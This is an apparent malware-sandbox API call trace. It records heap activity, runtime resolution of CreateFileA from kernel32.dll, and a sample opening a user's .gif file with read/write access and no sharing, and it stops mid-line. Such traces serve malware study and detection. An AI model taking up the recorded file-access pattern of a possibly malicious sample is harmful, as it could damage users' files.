[0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.657] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.657] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.658] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.658] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.659] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.659] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.659] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.660] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.660] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.661] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ca00 [0030.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ca00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.661] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.661] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.661] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0030.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ca00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0030.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.662] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0030.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0030.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.662] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.662] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x936008 [0030.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f36e0 [0030.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", cchWideChar=76, lpMultiByteStr=0x7f36e0, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpUsedDefaultChar=0x0) returned 76 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0030.663] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\hgd17pyt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0030.663] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.663] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0030.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x98) returned 0x7c5448 [0030.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x936008, cbMultiByte=76, lpWideCharStr=0x7c5448, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif") returned 76 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x936008 | out: hHeap=0x770000) returned 1 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0030.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.665] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0030.665] HeapFree (in: 